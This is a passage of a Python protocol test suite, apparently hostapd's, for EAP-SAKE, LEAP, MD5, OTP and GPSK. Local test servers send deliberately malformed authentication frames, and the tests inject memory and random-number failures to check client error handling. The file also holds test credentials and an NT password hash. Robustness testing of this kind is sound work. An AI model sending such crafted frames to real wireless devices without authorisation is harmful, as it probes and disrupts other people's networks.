ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sake_process_challenge"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_sake_errors2(dev, apdev):
"""EAP-SAKE protocol tests (2)"""
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_identity"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
"""EAP-LEAP protocol tests"""
check_eap_capa(dev[0], "LEAP")
def leap_handler(ctx, req):
logger.info("leap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 2:
logger.info("Test: Unexpected version")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 0)
if ctx['num'] == 3:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 4:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 8)
if ctx['num'] == 5:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 6:
logger.info("Test: Missing payload in Response")
return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 7:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 8:
logger.info("Test: Unexpected version in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 8)
if ctx['num'] == 9:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 10:
logger.info("Test: Invalid challenge length in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 11:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 12:
logger.info("Test: Truncated challenge in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 24)
if ctx['num'] == 13:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 14:
logger.info("Test: Invalid challange value in Response")
return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0, 0, 0, 0, 0, 0)
if ctx['num'] == 15:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 16:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
if ctx['num'] == 17:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 18:
logger.info("Test: Success")
return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
# hostapd will drop the next frame in the sequence
if ctx['num'] == 19:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 20:
logger.info("Test: Failure")
return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
return None
srv = start_radius_server(leap_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 12):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
if i == 10:
logger.info("Wait for additional roundtrip")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_leap_errors(dev, apdev):
"""EAP-LEAP protocol tests (error paths)"""
check_eap_capa(dev[0], "LEAP")
def leap_handler2(ctx, req):
logger.info("leap_handler2 - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(leap_handler2)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_leap_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_leap_process_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_leap_process_success"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_leap_process_success"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "nt_password_hash;eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "nt_password_hash;eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1,
"nt_challenge_response;eap_leap_process_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
"""EAP-MD5 protocol tests"""
check_eap_capa(dev[0], "MD5")
def md5_handler(ctx, req):
logger.info("md5_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MD5)
if ctx['num'] == 2:
logger.info("Test: Zero-length challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
0)
if ctx['num'] == 3:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
1)
if ctx['num'] == 4:
logger.info("Test: Shortest possible challenge and name")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
return None
srv = start_radius_server(md5_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 4):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_md5_errors(dev, apdev):
"""EAP-MD5 local error cases"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(dev[0], 1, "chap_md5"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_md5_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
def test_eap_proto_otp(dev, apdev):
"""EAP-OTP protocol tests"""
def otp_handler(ctx, req):
logger.info("otp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Empty payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_OTP)
if ctx['num'] == 2:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
if ctx['num'] == 3:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
if ctx['num'] == 4:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
return None
srv = start_radius_server(otp_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 1):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-OTP"])
if ev is None:
raise Exception("Request for password timed out")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-OTP-" + id + ":password")
ev = dev[0].wait_event("CTRL-EVENT-EAP-SUCCESS")
if ev is None:
raise Exception("Success not reported")
finally:
stop_radius_server(srv)
def test_eap_proto_otp_errors(dev, apdev):
"""EAP-OTP local error cases"""
def otp_handler2(ctx, req):
logger.info("otp_handler2 - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(otp_handler2)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_otp_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
"""EAP-GPSK protocol tests"""
def gpsk_handler(ctx, req):
logger.info("gpsk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_GPSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown opcode")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Too short GPSK-1")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated ID_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing RAND_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing CSuite_List")
return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Empty CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Invalid CSuite_List")
return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 No supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-1")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite but too short key")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
